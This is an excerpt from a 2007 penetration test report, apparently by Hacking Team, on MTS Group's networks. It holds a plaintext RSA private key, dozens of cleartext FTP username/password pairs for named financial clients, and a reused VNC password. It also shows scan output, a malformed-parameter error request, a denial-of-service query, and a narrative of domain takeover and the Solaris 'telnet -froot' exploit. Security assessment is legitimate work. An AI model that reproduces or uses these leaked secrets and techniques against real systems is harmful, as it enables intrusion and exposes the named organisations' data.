© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 51 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bHkxDjAMBgNVBAcTBU1pbGFuMRIwEAYDVQQKEwlNVFMgR3JvdXAxCzAJBgNVBAsT
AklUMRcwFQYDVQQDEw5mdHBzLm10c3NwYS5pdDEkMCIGCSqGSIb3DQEJARYVdGVj
aG9wc19taWxAbXRzc3BhLml0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDM
zrr2MTnvxDZSirBK9gpTr+1Gr7h3yeFXckBw2SdR11Y+dsvmAv42rz0Y9BjkCfeF
ev2Az2Za5+QZhKXtCqLdvrEihnMSLb1oUle/vnyqW1aJLyrPY11SX8tc9wKnXK57
SLOf0KRQmU9qJQOcpQpLPW/luJc64i3AFxsuGu0GXQIDAQABMA0GCSqGSIb3DQEB
BAUAA4GBADhplK9UQpCZwTE6vcbV+C0hM/dZIQGYcg5wpGIdRdFr4UIwrpg+Z3Qu
+t/8cOlIs+FEGAkZ/glVJ/j6Col7eOmU2SavHCR/NCdJtf3EPKNPeeNs3sNCR/+o
POLXKkp2tcrfRTzXKbxF2oGXEHSsTlMJ0WLsmHWUObWYeb5rqFTr
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE REQUEST-----
MIIBzjCCATcCAQAwgY0xCzAJBgNVBAYTAklUMQ4wDAYDVQQIEwVJdGFseTEOMAwG
A1UEBxMFTWlsYW4xEjAQBgNVBAoTCU1UUyBHcm91cDELMAkGA1UECxMCSVQxFzAV
BgNVBAMTDmZ0cHMubXRzc3BhLml0MSQwIgYJKoZIhvcNAQkBFhV0ZWNob3BzX21p
bEBtdHNzcGEuaXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMzOuvYxOe/E
NlKKsEr2ClOv7UavuHfJ4VdyQHDZJ1HXVj52y+YC/javPRj0GOQJ94V6/YDPZlrn
5BmEpe0Kot2+sSKGcxItvWhSV7++fKpbVokvKs9jXVJfy1z3AqdcrntIs5/QpFCZ
T2olA5ylCks9b+W4lzriLcAXGy4a7QZdAgMBAAGgADANBgkqhkiG9w0BAQQFAAOB
gQBhopUt3OtVBXAf6j9Gfs2lN3exS9O/xGxDNRH1vdUqwrFVkp/DpmB8bjAlYsW3
yNslc9lfG74e5dDPz82Wmnpwru+nKgq/oxlfn7L6NFpehu+oYaD+jYFgK69Lr2s0
EPphlsfnhKyxTNtyA1F2UbW2lkKmJUb49p9ElCqX0Zm2eQ==
-----END CERTIFICATE REQUEST-----
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,28772F47AC4EB144
px50WJ+R9GGz7nxw4V+u/f6hgGVmDw6InTOovZ+TkIqzHA7wUGQb3JQ8F6bBbJxx
s5IcQHSD+/+ErsOnIHiV6tGxAGmeA0nTu1/jMRZP47D+eu1pVrU3KoX6uLoVg4mG
Ogvm9c2KNrMcFyUKOTjIArq/+ePzUhrP255Hid2476amg9S3X7klOCUYWSTzHSIQ
3Ry7beWxrGHNLYW6+sAgonI2PboTidsYjb9EAod2iT1hECfURjhMp9Kvceu5b5QV
tMyqBVZ+DuDc1hpsPpxe2jd0lgKVeK1OSGkyTTAWR6OHLtOD8vAf3IcGUNtMDnIc
njLkvVbMcUR+Bu3jpQyNCgUS0tnkI1ZlYvO7uoFOhpQ+loJMAG5LGlgaZBEz6D7k
2EpGiJbLgQ8H+00j4gfD3lYorNyJJLIO4/d9tltNtdSHEbG/fRmBFAvvzqLaYUJw
r/Ki6rW8C1rBXD4sIUby9/UNFwhxQuqfyI7VPGjW4z/AXLudjoqjg+t4ZBp7cUlQ
VJm6GXOxIDRKf7okn9JhigT1fBj97Bs533QGqp8ufeYt+se4pthH6GcSZARVBuro
YoCn6yE28Hrf1mH/oZ3u9HV3LXjYv5xoijS9Kp7S6HjqQu+r1MphkwTHFY9c/xhB
iR+AgU0vJOqJcF2A6B0/JKaS8Vvkobgq3wSmNLSum6rwSBHriPH19XyLh19GG8zb
WzsBP5NqQ+7q6xe+q0Fi2gsfUudgefLcH9O/pJBIYrdF2aqRcnjWLnw6PnkxR/s+
CtKWwsq8fUQmUesc4tr34VCr5omMOrVnvP6/fARnAVZ28z+YL5QeKw==
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 52 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
-----END RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDMzrr2MTnvxDZSirBK9gpTr+1Gr7h3yeFXckBw2SdR11Y+dsvm
Av42rz0Y9BjkCfeFev2Az2Za5+QZhKXtCqLdvrEihnMSLb1oUle/vnyqW1aJLyrP
Y11SX8tc9wKnXK57SLOf0KRQmU9qJQOcpQpLPW/luJc64i3AFxsuGu0GXQIDAQAB
AoGBAI6n/MBZX4KryC7MXamJIX5TT1HqOfJuUyDG+y3fhCzUckVGGBZZxVqvyz3j
YKcObjOyjHs5e5Ecbtx7cdvfibrt15uWrxgHu+nlwwE2e+Bz8te+qZjpH3sYLeIZ
vJ+IkDMxQk8nF6JiSEubgHNMqPFmuBisSIB7Xue2hWOwEpc9AkEA7Q1mkuRRkFRJ
AldGHknomvFLQwJSmiAHn1k9b4XbUxXOQ5gkd6Kr1Jkq9W+F+GZSx5kKwHlQ7iFB
YRIMV0BdzwJBAN0tiCG66sVw3+kBdlY0qIcXV76aNYP2JFgqPPZTYs7JZN1fLe1H
G3wcx1aWY5ON9XHxzLS2lP+Qw9avV0SM8BMCQBfzyK+C/nLU8WOZKe6ZjTVKuE4X
B/2myt5hCAIixlyI0YSm9NhZyX770wllsWW+ARNF9X4pQ/Irzg1e43xVdqUCQQDK
FTrnTqgI49vBQdPEafJ9E6fY/37b5j5Iy7bNfVyvATWGSdtli22iVY0QIPI0NCVJ
CZt2lcfHRZaZhbUfbgI/AkEA2BGoBRuFsnUl7UmTSOUFtdPuZ+DuiU6dc/z4b7Mu
qkLApC8MpH6OQp/SiqmC8lBtI2Xzms1filafmsRTKgte5Q==
-----END RSA PRIVATE KEY-----
The file (NFS/FTP) server was identified as an EMC2 appliance:
$ sudo nmap -sS -O -v 192.168.253.70
Password:
Starting Nmap 4.20 ( http://insecure.org ) at 2007-09-07 21:54 CEST
Initiating Parallel DNS resolution of 1 host. at 21:54
Completed Parallel DNS resolution of 1 host. at 21:54, 6.56s elapsed
Initiating SYN Stealth Scan at 21:54
Scanning 192.168.253.70 [1697 ports]
Discovered open port 21/tcp on 192.168.253.70
Discovered open port 8888/tcp on 192.168.253.70
Discovered open port 12345/tcp on 192.168.253.70
Discovered open port 2049/tcp on 192.168.253.70
Discovered open port 1234/tcp on 192.168.253.70
Discovered open port 10000/tcp on 192.168.253.70
Discovered open port 111/tcp on 192.168.253.70
Completed SYN Stealth Scan at 21:54, 8.75s elapsed (1697 total ports)
Initiating OS detection (try #1) against 192.168.253.70
Retrying OS detection (try #2) against 192.168.253.70
Retrying OS detection (try #3) against 192.168.253.70
Retrying OS detection (try #4) against 192.168.253.70
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 53 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Retrying OS detection (try #5) against 192.168.253.70
Host 192.168.253.70 appears to be up ... good.
Interesting ports on 192.168.253.70:
Not shown: 1690 closed ports
PORT STATE SERVICE
21/tcp open ftp
111/tcp open rpcbind
1234/tcp open hotline
2049/tcp open nfs
8888/tcp open sun-answerbook
10000/tcp open snet-sensor-mgmt
12345/tcp open NetBus
No OS matches for host (If you know what OS is running on it, see
http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=9/7%OT=21%CT=1%CU=38998%PV=Y%DS=2%G=Y%TM=46E1AC85%P=i686-p
OS:c-linux-gnu)SEQ(SP=11%GCD=FA00%ISR=9C%TS=3)SEQ(SP=13%GCD=FA00%ISR=9E%II=
OS:I%TS=2)SEQ(SP=11%GCD=FA00%ISR=9C%II=I%TS=3)OPS(O1=M548NNSNW3NNT11%O2=M54
OS:8NNSNW3NNT11%O3=M548NW3NNT11%O4=M548NNSNW3NNT11%O5=M548NNSNW3NNT11%O6=M5
OS:48NNSNNT11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%D
OS:F=N%T=40%W=FFFF%O=M548NNSNW3%CC=N%Q=)T1(R=Y%DF=N%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=FF%TOS=0%IPL=38%UN=0%RIPL=G%RID=1042%RIPCK=
OS:I%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=N%T=FF%TOSI=S%CD=S%SI=S%DLI=S)
Uptime: 214.402 days (since Mon Feb 5 11:15:57 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=17 (Good luck!)
IPID Sequence Generation: Busy server or unknown class
OS detection performed. Please report any incorrect results at
http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 27.911 seconds
Raw packets sent: 1875 (86.770KB) | Rcvd: 1764 (72.630KB)
Cleartext versions of the FTPD passwords have been found previously (during the internal penetration test)
on the lmenegasso workstation, leading to complete read/write compromise of the FTP service on the EMC
appliance:© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 54 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ftp://BankIMIdaily:[email protected]/
ftp://BankIMImonthly:[email protected]/
ftp://calyondaily:[email protected]/
ftp://calyonmonthly:[email protected]/
ftp://capitalia:[email protected]/
ftp://ccompensazione:[email protected]/
ftp://cdcixis:[email protected]/
ftp://comstock:G45&m887([email protected]/
ftp://comstockp:[email protected]/
ftp://consob:[email protected]/
ftp://coveafindaily:[email protected]/
ftp://coveafinmonthly:[email protected]/
ftp://CSAMmonthly:[email protected]/
ftp://csdataforcast:[email protected]/
ftp://EcoWinABDaily:[email protected]/
ftp://EcoWinABMonthly:[email protected]/
ftp://euronext:7$;[email protected]/
ftp://FactsetDaily:[email protected]/
ftp://FactsetMonthly:[email protected]/
ftp://Finifo:[email protected]/
ftp://finmerc:[email protected]/
ftp://fourcast:[email protected]/
ftp://fourrefcast:[email protected]/
ftp://ftpstats:[email protected]/
ftp://guest:[email protected]/
ftp://IFSrealtime:[email protected]/
ftp://imibankdaily:[email protected]/
ftp://imibankmonthly:[email protected]/
ftp://inetradware:[email protected]/
ftp://itsoftdaily:[email protected]/
ftp://ixiscibdaily:[email protected]/
ftp://ixiscibmonthly:[email protected]/
ftp://jetmultidaily:[email protected]/
ftp://jetmultimonthly:[email protected]/
ftp://kestrel:[email protected]/
ftp://lagefidaily:[email protected]/
ftp://morganstdaily:[email protected]/
ftp://morganstmonthly:[email protected]/
ftp://Morningstardaily:[email protected]/
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 55 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ftp://mts:4^[email protected]/
ftp://mtsbvision:[email protected]/
ftp://mtscap:[email protected]/
ftp://mtsccg:[email protected]/
ftp://mtsceto:[email protected]/
ftp://mtscmf:[email protected]/
ftp://mtsconsob:[email protected]/
ftp://mtsforcast:[email protected]/
ftp://MTSInternet:[email protected]/
ftp://mtsrefp:[email protected]/
ftp://mtstest:[email protected]/
ftp://Natexis:[email protected]/
ftp://Natexisdaily:[email protected]/
ftp://NatexisMonthly:[email protected]/
ftp://oli4ftp:[email protected]/
ftp://reuters:[email protected]/
ftp://reutersp:[email protected]/
ftp://riskmetricsdaily:XMe78&CI^Q>[email protected]/
ftp://riskmetricsmonthly:[email protected]/
ftp://russellmedaily:[email protected]/
ftp://russellmereal:[email protected]/
ftp://SusqueDaily:[email protected]/
ftp://SusqueMonthly:[email protected]/
ftp://telekurs:[email protected]/
ftp://testservice:[email protected]/
ftp://Thomson:[email protected]/
5.7 Vadds website
Rating: unsafe
Vulnerabilities found: V7, V8
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: review the parameter checking of the java script vadds_detail.jsp and restrict them to the needed
ones, disable or filter all error messages in a way that they do not disclose sensitive information to an
attacker
The website is available at vadds.mtsgroup.org.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 56 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The application exposes error messages, implement proper error handling:
http://vadds.mtsgroup.org/vadds/vadds_detail.jsp?path=|!%22%C2%A3$%&/()=?
HTTP Status 500 -
type Exception report
message
description The server encountered an internal error () that prevented it from
fulfilling this request.
exception
org.apache.jasper.JasperException: Unable to process user request for internal
error. Please contact the administrator.
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper
.java:512)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:383)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:802)
root cause
java.rmi.RemoteException: Unable to process user request for internal error.
Please contact the administrator.
it.softsolutions.fevadds.requestmgr.RequestMgr.getValueInSimpleXML(RequestMgr.ja
va:773)
org.apache.jsp.vadds_005fdetail_jsp._jspService(vadds_005fdetail_jsp.java:98)
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97)
javax.servlet.http.HttpServlet.service(HttpServlet.java:802)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 57 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:334)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:802)
note The full stack trace of the root cause is available in the Apache
Tomcat/5.5.20 logs.
Apache Tomcat/5.5.20
The application consumes many resources on special queries, this could lead to a Denial of Service:
http://vadds.mtsgroup.org/vadds/vadds_detail.jsp?path=*
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 58 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6 Internal networks
6.1 Technical summary
This page summarizes the tactics employed in the internal penetration testing activity to gain a global picture
of how the attacks were performed.
The firewalls didn't interfere with the testing activities: all hosts and ports seems to be unfiltered (except for
the personal firewalls installed on some hosts).
The Penetration Testing from MPLS on the 100.100.100/24 network evidenced 29 systems, 14 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and information disclosure.
The vulnerable systems ratio in this subnet is 48.27% symbolizing a critical and risky situation.
The Penetration Testing from MPLS on the 100.100.200/24 network evidenced 92 systems, 34 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and information disclosure.
The Penetration Testing from MPLS on the 192.168.210/24 network evidenced 45 systems, 21 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and information disclosure.
The vulnerable systems ratio in this subnet is 46.67% symbolizing a critical and risky situation.
The Penetration Testing from MPLS on the 192.168.244/24 network evidenced 6 systems, 3 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and information disclosure.
The vulnerable systems ratio in this subnet is 50.00% symbolizing a critical and risky situation.
The Penetration Testing from MPLS on the 192.168.254/24 network evidenced 43 systems, 21 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and information disclosure.
The vulnerable systems ratio in this subnet is 48.84% symbolizing a critical and risky situation.
By discovering and testing the internal network we acquired knowledge and confidential information about
the network topology, the services available, local and network users and their passwords.
Many systems were affected by issues allowing direct exploitation. Microsoft Windows clients were
exposing network users and passwords that logged locally trough their local password caches (MS registry
cache). In most cases password hashes were recovered to plain text by brute force attacks.
We found several vulnerable Active Directory domain controllers which were affected by remotely
exploitable vulnerabilities and allowed direct system compromise with SYSTEM privileges (Veritas BE
client remote exploit). We suggest to install latest Veritas BE clients on all systems and not only on the
exploited ones.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 59 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
By using trust relationships between MS Windows machines and domain users we gained access to
Administrative privileges on AD servers. At the end of this successful process we were acting as Domain
Administrators of two Active Directory trees (MTS/MTSGROUP and EUROMTS).
By impersonating a domain administrator we had complete access to all MS Windows based systems, even if
most systems were not vulnerable.
This allowed unconditioned access to all the Windows machines members of the compromised domain (or in
domains with trust relationships with the compromised ones) with the highest privilege available. In detail,
our newly created account was able to administrate all the machines and domain servers of the network and
access those machines with create/read/write/delete privileges to all the existing Windows network shares
($IPC, $C, $D, etc).
Many Windows clients and servers were not totally up to date and were showing the Windows Update
dialog. Domain servers were not running any sort of anti-virus program. Some windows clients had the built-
in firewall disabled and custom service installations, probably for development purposes. Some of these
custom services had no authentication at all or weak passwords or authentication bypass issues.
At this point a second information discovery rush was performed. We acquired user passwords, detailed
network topology, client applications and their authorization tokens, public ssh keys and many public and
private Crypto keys and SSL certificates.
At the same time, many Sun Solaris servers were discovered and accessed by using directly exploitable
vulnerabilities leading to information disclosure, DoS and root compromise. Some of the used exploits are
extremely reliable, easy to use and resulting in root access, as the “telnet -l -froot/-l -fbin” one.
Chrooted systems were deployed using Solaris zones. We evaded them directly or compromised the master
server by using several different techniques. Some application servers were deployed using this method. We
accessed user names and passwords hashes, data, mysql accounts, web applications passwords and many
SSL certificates. In most cases passwords hashes were recovered to plain text by bruteforcing.
On some development Solaris machines the VNC service was installed, we recovered the password hash and
decrypted it and later it was possible to reuse the found password to login on other VNC servers, many of
them logged as the Oracle local Unix user.
We found many printers susceptible to information leakage, with no administration authentication or weak
and default passwords. This can lead to DoS but also to sensitive information disclosure that can be used to
perform social engineering attacks: printing/fax/copy activity, usernames, document titles, first and last
names of people, telephone and fax numbers and addresses.
The overall situation suggests a complete network review and hardening.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 60 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.2 Servers
The network and service scans revealed a network (192.168.254.0/24) with 44 servers and a network
(192.168.244.0/24) with 6 servers. Other 49 servers have been identified in the remaining three internal
networks. To distinguish a server from a workstation we used, when possible, the uptime, the OS version
installed, the services installed on the host and the continous availability of the host on the network.
We considered as being servers also the network appliances like 3Com switches, Cisco routers, PIX and
Checkpoint firewalls.
The total was 99 servers and 46 of them are rated critical or unsafe.
For each internal network, we first list the critical and unsafe ones and then the safe ones.
6.3 Servers in Network 192.168.254.0/24
6.3.1 192.168.254.10 [Compromised]
Rating: compromised
Vulnerabilities found: V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the VNC password and make it unique for this server
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised Compromised by Vnc Info Vnc with weak password
Auth Vnc with password edcrdx
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 61 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Solaris management console server (Java 1.4.2_08;
Tomcat 2.1; SunOS 5.9 sparc)
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1522/tcp open oracle-tns Oracle TNS Listener
4045/tcp open rpc
5520/tcp open sdlog Oracle Enterprise Manager
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32786/tcp open rpc
32787/tcp open kcms_server 1 (rpc #100221)
Uptime: 108.712 days (since Sat Mar 31 12:38:31 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=157 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwha, .mtsdwha; OSs: Solaris, Unix, SunOS
It was possible to login to the VNC service reusing a VNC password found on another compromised system
leading to local privilege escalation and full system compromise.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 62 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.3.2 192.168.254.16 [Compromised]
Rating: compromised
Vulnerabilities found: V4, V5, V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the VNC password and make it unique for this server; install all vendor updates especially
the TCP/IP stack and SSH related ones; disable SSH protocol v1 support and only enable v2
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised Compromised by Vnc Info Vnc with weak password
Auth Vnc with password edcrdx
The host was alive and these additional information could be extracted:
21/tcp open ftp Sun Solaris 8 ftpd
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
25/tcp open smtp Sendmail 8.11.7p1+Sun/8.11.6
111/tcp open rpcbind 2-4 (rpc #100000)
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.11.7p1+Sun/8.11.6
665/tcp open unknown
1521/tcp open oracle-tns Oracle TNS Listener
1522/tcp open oracle-tns Oracle TNS Listener
1527/tcp open oracle-tns Oracle TNS Listener
2201/tcp open ats?
4045/tcp open nlockmgr 1-4 (rpc #100021)
5801/tcp open vnc-http AT&T VNC (User prodappl; Resolution 1268x982;
VNC TCP port 5901)
5901/tcp open vnc VNC (protocol 3.3)
6001/tcp open X11 (access denied)
6112/tcp open dtspc?
7001/tcp open oracle-tns Oracle TNS Listener
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 63 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
13783/tcp open vnetd Veritas Netbackup Network Utility
32771/tcp open status 1 (rpc #100024)
32772/tcp open rusersd 2-3 (rpc #100002)
32773/tcp open ttdbserverd 1 (rpc #100083)
32774/tcp open kcms_server 1 (rpc #100221)
32775/tcp open dr_daemon 4 (rpc #300326)
32776/tcp open metad 1 (rpc #100229)
32777/tcp open metamhd 1 (rpc #100230)
32778/tcp open sometimes-rpc19?
32779/tcp open dmispd 1 (rpc #300598)
Uptime: 262.417 days (since Sat Oct 28 20:08:33 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Hosts: milfintest, mtsgroup.org; OSs: Solaris, Unix
It was possible to login to the VNC service reusing a VNC password found on another compromised system
leading to local privilege escalation and full system compromise.
The TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
The SSH daemon uses an outdated protocol version.
6.3.3 192.168.254.21 [Compromised]
Rating: compromised
Vulnerabilities found: V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the VNC password and make it unique for this server
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Netra T1 105
Hostname Not detected
Compromised Compromised by Vnc Info Vnc with weak password
Auth Vnc with password edcrdx
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 64 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.4+Sun/8.13.4
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.4+Sun/8.13.4
1521/tcp open oracle-tns Oracle TNS Listener
2049/tcp open nfs 2-4 (rpc #100003)
4045/tcp open nlockmgr 1-4 (rpc #100021)
5801/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port:
5901)
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open gsql_trn 1 (rpc #1073741840)
32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open mdcommd 1 (rpc #100422)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open metamhd 1 (rpc #100230)
32777/tcp open rusersd 2-3 (rpc #100002)
32778/tcp open ttdbserverd 1 (rpc #100083)
Uptime: 347.456 days (since Fri Aug 4 19:13:34 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=153 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: milatstest, milatstest.mtsgroup.org; OSs: Solaris, Unix
It was possible to login to the VNC service reusing a VNC password found on another compromised system
leading to local privilege escalation and full system compromise.
6.3.4 192.168.254.22 [Compromised]
Rating: compromised© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 65 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the VNC password and make it unique for this server
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Netra T1 105
Hostname Not detected
Compromised Compromised by Vnc Info Vnc with weak password
Auth Vnc with password edcrdx
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
665/tcp open unknown
1521/tcp open oracle-tns Oracle TNS Listener
4045/tcp open nlockmgr 1-4 (rpc #100021)
5801/tcp open vnc-http AT&T VNC (User oracle; Resolution 1268x982; VNC TCP
port 5901)
5802/tcp open vnc-http AT&T VNC (User oracle; Resolution 1268x982; VNC TCP
port 5902)
5901/tcp open vnc VNC (protocol 3.3)
5902/tcp open vnc VNC (protocol 3.3)
6001/tcp open X11:1?
6002/tcp open X11 (access denied)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 66 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
32771/tcp open ttdbserverd 1 (rpc #100083)
32772/tcp open kcms_server 1 (rpc #100221)
